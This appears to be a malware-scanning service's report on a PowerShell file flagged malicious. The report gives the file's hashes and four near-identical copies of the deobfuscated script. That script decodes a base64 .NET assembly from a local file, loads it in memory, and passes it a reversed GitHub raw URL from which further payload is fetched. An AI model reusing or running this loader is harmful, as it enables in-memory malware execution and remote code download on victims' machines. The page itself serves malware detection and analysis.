Malicious
Malicious

288e28ea13225c33394aee9d2d8e4c02

Share on LinkedIn Add to favorites
Re-Scan
Delete
PowerShell
MD5: 288e28ea13225c33394aee9d2d8e4c02
Size: 1.31 KB
application/x-powershell
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
288e28ea13225c33394aee9d2d8e4c02
Sha1
ead8f8d3fdf1f35cba0672755a7c8a02c27378be
Sha256
363051592819af125a1b2b5e7b286d7e782267f41e4699db78c91fac2c0b26ee
Sha384
3db6dc47f510e586a46f332a181d4a8c35affbc65ade4ad090f242deb6dc4e207f2d4ce85837821ead6c596cd2e2476f
Sha512
6c7a38fb4d4c59c6adcf90961b6b53e85f591cb7702c5c504387a18ef08b8c4ad1fb4680ae849a2774ea9c0ce4db453cb4d665b5e43d8ef66762a001d380d8e4
SSDeep
24:Qlv4o4Kzyu52U/tMlBygklBRlB0P8wPMuZJBlBMwA6PFv+F5TqJMJ:A4oPtM7ktApDPwF5TbJ
TLSH
63219210AAFC8E157673DA0587BAE09059767ADCDD35C70CC354C10C06AE9449C56F37
File Structure
288e28ea13225c33394aee9d2d8e4c02
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_71c79c58dc14cf56ff1c7c4dea1894b4b4d9794a84abb0cc65168a99c0429c69.vbs", "____________________________________________-------", "0", "1", "caca")))
Deobfuscated PowerShell

$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_71c79c58dc14cf56ff1c7c4dea1894b4b4d9794a84abb0cc65168a99c0429c69.vbs", "____________________________________________-------", "0", "1", "caca") } )))
Deobfuscated PowerShell

$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_71c79c58dc14cf56ff1c7c4dea1894b4b4d9794a84abb0cc65168a99c0429c69.vbs", "____________________________________________-------", "0", "1", "caca") } ))
Deobfuscated PowerShell

$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_71c79c58dc14cf56ff1c7c4dea1894b4b4d9794a84abb0cc65168a99c0429c69.vbs", "____________________________________________-------", "0", "1", "caca") } ))
288e28ea13225c33394aee9d2d8e4c02 (1.31 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙